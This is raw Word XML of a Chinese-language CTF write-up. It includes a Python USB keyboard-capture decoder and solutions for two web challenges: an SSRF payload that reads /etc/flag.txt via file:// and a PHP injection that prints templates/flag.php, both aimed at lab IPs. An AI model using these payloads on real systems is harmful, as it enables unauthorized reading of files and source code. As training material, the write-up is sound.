        <w:t>lines = ["","","","",""]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF4F901" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A018C94" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t>pos = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387AF537" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01"/>
    <w:p w14:paraId="601E0496" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t>for x in open("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.txt","r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readlines</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA2E4E0" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    code = int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>6:8],16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56336547" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC13108" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    if code == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82CA62" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B0092" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    # newline or down arrow - move down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371BB40" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    if code == 0x51 or code == 0x28:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D297AC3" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        pos += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57760F" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15591AF5" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    # up arrow - move up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BE613" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    if code == 0x52:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44661BCD" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        pos -= 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C456A75" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E11BBF5" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01"/>
    <w:p w14:paraId="79647B58" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    # select the character based on the Shift key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCDAE7" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    if int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0:2],16) == 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6942E" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        lines[pos] += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usb_codes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[code</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F6E64" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AAEFAF" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        lines[pos] += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usb_codes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[code</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B9E211" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2289AE" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E08BA71" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t>for x in lines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72107B3B" w14:textId="2EE12F96" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>print(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ADB319" w14:textId="03753116" w:rsidR="00946A6A" w:rsidRDefault="00517F01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后跑出来了一串字符串，</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00946A6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们把字符串分分段，可以看到FLAG</w:t>
      </w:r>
      <w:r w:rsidR="00946A6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00946A6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IS</w:t>
      </w:r>
      <w:r w:rsidR="00946A6A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00946A6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XXX的字样，我们即拿到flag了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07CA35" w14:textId="1AC4E939" w:rsidR="00946A6A" w:rsidRDefault="00946A6A">
      <w:r w:rsidRPr="00946A6A">
        <w:t>HELLOBOYSANDGIRLSYOUARESOSMARTTHATYOUCANFINDTHEFLAGTHAT     IHIDEIN THEKEYBOARD PACKAGE FLAG IS JHAWLZKEWXHNCDHSLWBAQJTUQZDXZQPF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D26EA" w14:textId="261A2576" w:rsidR="00946A6A" w:rsidRPr="00946A6A" w:rsidRDefault="00946A6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lag：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>JHAWLZKEWXHNCDHSLWBAQJTUQZDXZQPF</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79580863" w14:textId="0AE19C01" w:rsidR="006267FA" w:rsidRDefault="006267FA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>eb2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A8F82" w14:textId="63D7BBB4" w:rsidR="00F82117" w:rsidRDefault="00F82117">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先题目说了这是道SSRF的题目，并且Hint提示我们flag藏在/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/flag.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下，那我们就直接去尝试构造下面即可~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE08131" w14:textId="4D4B3A70" w:rsidR="006267FA" w:rsidRDefault="00F82117">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="006267FA" w:rsidRPr="00FF18F6">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73B3562F" w14:textId="067F2C20" w:rsidR="006267FA" w:rsidRPr="006267FA" w:rsidRDefault="006267FA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57CC8344" wp14:editId="4687F825">
            <wp:extent cx="5274310" cy="1924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633" w14:textId="4BE42B4E" w:rsidR="006267FA" w:rsidRDefault="006267FA">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lag：</w:t>
      </w:r>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>XMAN{f1l3_pr0toc0l_1s_us3ful}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F49FA8" w14:textId="1995DC2F" w:rsidR="00F82117" w:rsidRDefault="006267FA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>eb4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CC48D" w14:textId="54DA7C2B" w:rsidR="00F82117" w:rsidRDefault="00F82117">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们直接构造如下payload即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697E6412" w14:textId="7F19F7D0" w:rsidR="006267FA" w:rsidRDefault="006267FA" w:rsidP="006267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7FA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">http://202.112.51.184:15080/?page=%27%20and%20die(show_source(%27templates/flag.php%27))%20or%20%27 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2244D010" w14:textId="3E4548F3" w:rsidR="006267FA" w:rsidRPr="006267FA" w:rsidRDefault="006267FA" w:rsidP="006267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0C5E55" wp14:editId="3F8FF595">
            <wp:extent cx="5274310" cy="1133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A1AE" w14:textId="75DD93F8" w:rsidR="006267FA" w:rsidRPr="006267FA" w:rsidRDefault="006267FA">
      <w:r>
        <w:t>Flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>XMAN{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>flag_is_so_cool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C1E3A" w14:textId="77777777" w:rsidR="006267FA" w:rsidRDefault="006267FA"/>
    <w:sectPr w:rsidR="00626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03F"/>
    <w:rsid w:val="00032751"/>
    <w:rsid w:val="00517F01"/>
    <w:rsid w:val="006267FA"/>
    <w:rsid w:val="006E76C1"/>
    <w:rsid w:val="00836D5C"/>
    <w:rsid w:val="00946A6A"/>
    <w:rsid w:val="00952CF6"/>
    <w:rsid w:val="00C02295"/>
    <w:rsid w:val="00CA103F"/>
    <w:rsid w:val="00E7018B"/>
    <w:rsid w:val="00F8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9BE8F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5F748E54-EEE9-4640-8314-F7A714C2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E76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76C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C022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C022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267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6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5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202.112.51.184:11080/?site=file://www.baidu.com/etc/flag.txt%23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 志峰</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>聂 志峰</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-10T11:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-11T01:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>